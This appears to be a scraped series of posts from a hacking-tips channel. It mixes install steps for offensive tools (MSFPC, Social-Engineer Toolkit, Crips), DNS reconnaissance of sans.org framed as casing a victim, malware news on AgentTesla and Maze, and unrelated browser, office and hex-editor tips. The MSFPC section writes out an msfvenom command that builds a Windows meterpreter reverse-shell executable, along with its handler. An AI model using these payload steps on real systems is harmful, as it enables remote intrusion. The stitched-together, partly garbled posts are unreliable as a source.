Superb, #full windows #exploiting tutorial with pictures :)

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑This Tools is a collection of online IP Tools that can be used to quickly get information about IP Address's, Web Pages and DNS records.

F E A T U R E S :

-Whois lookup
-Traceroute
-DNS Lookup
-Reverse DNS Lookup
-GeoIP Lookup
-Port Scan
-Reverse IP Lookup

🄸🄽🅂🅃🄰🄻🄻🄸🅂🄰🅃🄸🄾🄽 & 🅁🅄🄽 :

1) git clone https://github.com/Manisso/Crips.git

2) cd Crips && python Crips.py

3) 0 : INSTALL & UPDATE

4) -> 0

5) press 0

E N J O Y ❤️👍🏻
U S E F O R L E A R N
@UndercodeTesting
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑A GOOD PAYLOAD CREATOR FOR LINUX :
MSFvenom Payload Creator (MSFPC) is a wrapper to generate multiple types of payloads, based on users choice. The idea is to be as simple as possible (only requiring one input) to produce their payload.

Fully automating msfvenom & Metasploit is the end goal (well as to be be able to automate MSFPC itself). The rest is to make the user's life as easy as possible (e.g. IP selection menu, msfconsole resource file/commands, batch payload production and able to enter any argument in any order (in various formats/patterns)).

The only necessary input from the user should be defining the payload they want by either the platform (e.g. windows), or the file extension they wish the payload to have (e.g. exe).

🄸🄽🅂🅃🄰🄻🄻🄸🅂🄰🅃🄸🄾🄽 & 🅁🅄🄽 :

A) MANUAL INSTALL :

> $ curl -k -L "https://raw.githubusercontent.com/g0tmi1k/mpc/master/msfpc.sh" > /usr/local/bin/msfpc

> $ chmod 0755 /usr/local/bin/msfpc

B) FOR KALI :

> root@kali:~# apt install -y msfpc

🦑 E X A M P L E :

Example #1 (Windows, Fully Automated Using Manual IP)
$ bash msfpc.sh windows 192.168.1.10
* MSFvenom Payload Creator (MSFPC v1.4.4)
i IP: 192.168.1.10
i PORT: 443
i TYPE: windows (windows/meterpreter/reversetcp)
[i] CMD: msfvenom -p windows/meterpreter/reversetcp -f exe \
--platform windows -a x86 -e generic/none LHOST=192.168.1.10 LPORT=443 \
> '/root/windows-meterpreter-staged-reverse-tcp-443.exe'

i windows meterpreter created: '/root/windows-meterpreter-staged-reverse-tcp-443.exe'

i MSF handler file: '/root/windows-meterpreter-staged-reverse-tcp-443-exe.rc'
i Run: msfconsole -q -r '/root/windows-meterpreter-staged-reverse-tcp-443-exe.rc'
? Quick web server (for file transfer)?: python2 -m SimpleHTTPServer 8080
* Done!
$
E N J O Y ❤️👍🏻
U S E F O R L E A R N
@UndercodeTesting
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑BEST OFFICE FOR LINUX :

-https://www.libreoffice.org/

-https://www.wps.com/

-https://www.openoffice.org/

-https://www.onlyoffice.com/

-https://www.freeoffice.com/en/

-http://www.davidmorelo.com

E N J O Y ❤️👍🏻
@UndercodeTesting
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁


🦑DNS HACKING-
Dig for DNS information:

> Dig is a tool to help sort out crazy DNS problems because people do weird things and when you’re trying to set up hosting, you run into the slot. So, let me tell you about the dig.

> Dig is a simple tool but has a lot of features because DNS has a lot of features, and what dig does is a command-line tool built into Linux by thinking there’s a port you can find for other operating systems. But, it’s a quick way to query directly at different DNS servers to see if there are records that are showing differently from one place to another.

> Dig is done to get the information about the authoritative name and also to get the server name.

🄸🄽🅂🅃🄰🄻🄻🄸🅂🄰🅃🄸🄾🄽 & 🅁🅄🄽 :

Open kali terminal and type :

1) $ dig sans.org

2) You can see it grabs the IP address of sans.org, i.e., 45.60.31.34

Now if we wish to find their email servers, we simply add mx to the end of command as shown below:

$ dig sans.org mx

3) Open Dnsenum
Dnsenum is a tool that kali and Backtrack own that does everything did do and much more. Where to find it? You can find it by approaching DNSenum in the applications.

4) Run Dnsenum
Let’s use this simple yet effective tool against SANS and by querying domain look for any additional information regarding their servers and subdomains. It is important to notice that all this reconnaissance is passive. The victim will never know we are casing their systems because we are not touching their systems at all, just the DNS servers look like normal traffic.

$ dnsenum sans.org -f /usr/share/dirbuster/wordlists/directories.jbrofuzz

5) $ locate wordlist

E N J O Y ❤️👍🏻
U S E F O R L E A R N
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑HOW SPEEDUP FIREFOX 50X FASTER BY OFFICIAL FIREFOX SUPPORT :

1) Refresh Firefox
We are constantly improving Firefox. The latest version is faster than ever before and contains fixes for many issues that could slow down your Firefox. See Update Firefox to the latest version for instructions on how to update it.

2) Update your graphics card drivers
Outdated drivers can slow down performance. Check the video card manufacturer's instructions on how to update your video drivers.

3) High consumption of hardware resources
If the monitoring tool shows high utilization of hardware resources, try the tips in Firefox is using too much random access memory (RAM) - how to fix it .

4) Firefox freezes or not responding
If Firefox stops responding and a spinning wheel appears instead of the cursor and the window turns white , see Firefox freezes or not responding - how to fix it .

5) I see a warning about an unresponsive script
“Unresponsive script warning”? What does this even mean? Believe it or not, for this case, we have an article Failure Scenario Warning - What it means and how to fix it , which will help clarify the situation.

6) Firefox takes a long time to start
Try following the tips in this article Firefox takes too long to start .

7) Check your computer for malware
To resolve slowness issues not specifically mentioned in this article, you should scan your computer for viruses, spyware, and other malware and read the article Troubleshoot Firefox problems caused by malware .

8) Optimize Windows
Speed up Windows can improve the performance of your computer. Read Tips to improve the performance of your Windows 10 PC at microsoft.com.

9) Block unwanted content
Content that you don't need, such as ads or a tracking script, can slow down your page load significantly. Firefox's built-in content blocking can speed up page loading by preventing third-party trackers from loading.

10) There are also Firefox add-ons that can block content you don't need, for example:

-The Disconnect add-on blocks invisible web page content that is tracking you online.

-The uBlock Origin add-on blocks ads, tracking services and other unwanted content, while being less memory and CPU intensive than other blockers.

-The NoScript add-on allows you to selectively enable or disable all runnable scripts on websites.

E N J O Y ❤️👍🏻
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

Windows Hacking
- exploit
- WPAD poisoning using Responder
- full tutorial with pictures

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑System security hidden file method to protect personal privacy :


1)) The first method is also the simplest: modify the attributes of the file directory

This method is the simplest, as long as you select the directory you want to hide, click the right mouse button, select "Properties", and tick "√" in the "Hidden" property check box. In this way, the directory has hidden attributes. This method is the simplest, but the security is also poor. As long as in the window "Tools", select "Folder Options" in the menu, and then select "Show All Files" in the "Hidden Files" part of "View" to display the hidden directories.

2)) The second method: hide through software encryption

There are many encryption hiding software under Windows, such as Magic Folders, EMF, etc., which can be used to hide or even encrypt directories. Here is a brief introduction to the use of EMF. First install EMF, generate a password disk during the installation process, insert the disk during operation, EMF checks the password on the disk, and enter the corresponding account, and then run the Magic.exe program and you will be asked to enter the password. This password will be entered later EMF password. If you want to display the directory again, you must also enter this password.

3)) The third method: hide through hard disk partition

Store the data to be encrypted in a special hard disk partition, and then use partition tools such as PQmagic to set this partition as a hidden partition. The specific method is: first start in DOS mode, then run PQmagic, select the partition you want to hide, select Hidepartition under Advanced in the Operations menu, exit, and restart. If you want to restore again, use the same method to enter PQmagic and remove the hidden partition. This method has strong concealment, but it also has certain dangers and may cause certain damage to the hard disk, so you should be cautious when using this method.

4)) The fourth method: alternative methods

Move the file to be hidden to a temporary folder, and then use WinZip or WinRAR with a password to compress it into a file. At this time, you can see in the "Explorer" that it was compressed with WinZip or WinRAR, some people Naturally, the corresponding decryptor will be used to decrypt it. And we changed its extension from ZIP or RAR to a non-existent file extension, such as SYJ, after double-clicking it, WinZip or WinRAR will not start and open it. However, you have to remember its real extension, and change the extension when you want to use it.

@undercodeTesting
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑AgentTesla spy Trojan's new trick :
#News

> Tesla RAT (Remote Access Trojan Horse) has become one of the most popular malware series threatening enterprises in the first half of 2020. The number of attacks discovered even exceeds TrickBot or Emotet, second only to Dridex. Although the Agent RAT has existed for at least 6 years, it is still adapting and evolving, frustrating the security efforts of many organizations. During the COVID-19 pandemic, new variants with additional features were introduced, and the malware has been widely used in phishing campaigns with the theme of coronavirus.

> The core of AgentTesla is a keylogger and information stealer. AgentTesla was first discovered at the end of 2014, and its usage has been increasing steadily in the past 1-2 years. The malware was initially sold in various underground forums and markets, as well as its own AgentTesla.com website (now discontinued). Like many contemporary agents, AgentTesla also provides the malware itself and a data collection management panel , The information obtained from the attacked device can be quickly obtained to the attacker through the panel interface.

#news
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑TOPIC EXPLOITATION 2020 updated :
The Social-Engineer Toolkit is an open-source penetration testing framework designed for social engineering. SET has a number of custom attack vectors that allow you to make a believable attack quickly. SET is a product of TrustedSec, LLC – an information security consulting firm located in Cleveland, Ohio.

🄸🄽🅂🅃🄰🄻🄻🄸🅂🄰🅃🄸🄾🄽 & 🅁🅄🄽 :

1) pip3 install -r requirements.txt python setup.py

2) git clone https://github.com/trustedsec/social-engineer-toolkit/ setoolkit/

3) cd setoolkit

4) pip3 install -r requirements.txt

5) python setup.py

6) choose options via numbers

E N J O Y ❤️👍🏻
U S E F O R L E A R N
@UndercodeTesting
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑2020 new extensions for speedup browsing :

A)) for chrome :

https://chrome.google.com/webstore/detail/fasterchrome/nmgpnfccjfjhdenioncabecepjcmdnjg

> https://chrome.google.com/webstore/detail/web-boost-wait-less-brows/ahbkhnpmoamidjgbneafjipbmdfpefad

> https://chrome.google.com/webstore/detail/amp-browser-extension/mccnchmofleakpdohkmljohfckgpdehb/

> https://chrome.google.com/webstore/detail/mcafee%C2%AE-web-boost/klekeajafkkpokaofllcadenjdckhinm?hl=en

B)) MULTI :

Block Comments Everywhere

- https://chrome.google.com/webstore/detail/shut-up-comment-blocker/oklfoejikkmejobodofaimigojomlfim

-https://addons.mozilla.org/en-US/firefox/addon/shut-up-comment-blocker/

-https://safari-extensions.apple.com/details/?id=net.rickyromero.shutup-TMM5P68287

E N J O Y ❤️👍🏻
@UndercodeTesting
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

\

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Maze ransomware for manipulating attacks :
#news

> Maze ransomware is currently one of the most widely used ransomware in the wild and is distributed by competent participants.

> We found a Maze branch that deployed a tailored persistence method before delivering the ransomware.

> The actor appears to have used a stolen certificate to sign his beacon.

> As with other attacks, the actor uses the HTA payload as an interactive shell that can capture real-time and defuzzified content.

🦑background

The Maze ransomware has been widely used in the past year or so and has become the ultimate payload for many different players around the world. This year, the notorious Maze operator not only started to blackmail the company through encrypted files, but also threatened to publish the stolen files online to blackmail the company. Recently, we caught a Maze member who tried to spread through the network of our customers.

In this article, we share detailed information about how the Maze member uses it to clarify their strategy and help the security team find similar IOCs in their own network.

#new
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Linux Hex Editors :

There are many Linux hex editors out there. Some of the popular ones are xxd, DHex, HexEdit, Bless, HexCurse etc. Here xxd, Dhex, Hexedit, HexCurse hex editors don’t have any graphical user interface, you can only use them from the Linux terminal. Bless hex editor does have a graphical user interface (GUI). Vim and Emacs can also be used as hex editors in Linux.

🄸🄽🅂🅃🄰🄻🄻🄸🅂🄰🅃🄸🄾🄽 & 🅁🅄🄽 :

Installing Linux Hex Editors
In this section, I am going to show you how to install the hex editors in Linux, especially on Ubuntu/Debian.

open terminal & type :

1) $ sudo apt-get update

2) $ sudo apt-get install xxd

3) Installing DHex:
You can install DHex with the following command:

$ sudo apt-get install dhex

4) You can run the following command to install HexEdit:

$ sudo apt-get install hexedit

5) You can install HexCurse with the following command:

$ sudo apt-get install hexcurse

6) To install Bless graphical hex editor, run the following command:

$ sudo apt-get install bless

7) NOTE: If you’re using Ubuntu/Debian, and you want to follow along, you will need to install the C/C++ development tools for compiling C programs. Just run ‘sudo apt-get update’ and then run ‘sudo apt-get install build-essential -y’ to install the C/C++ development tools on Ubuntu/Debian.

E N J O Y ❤️👍🏻
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁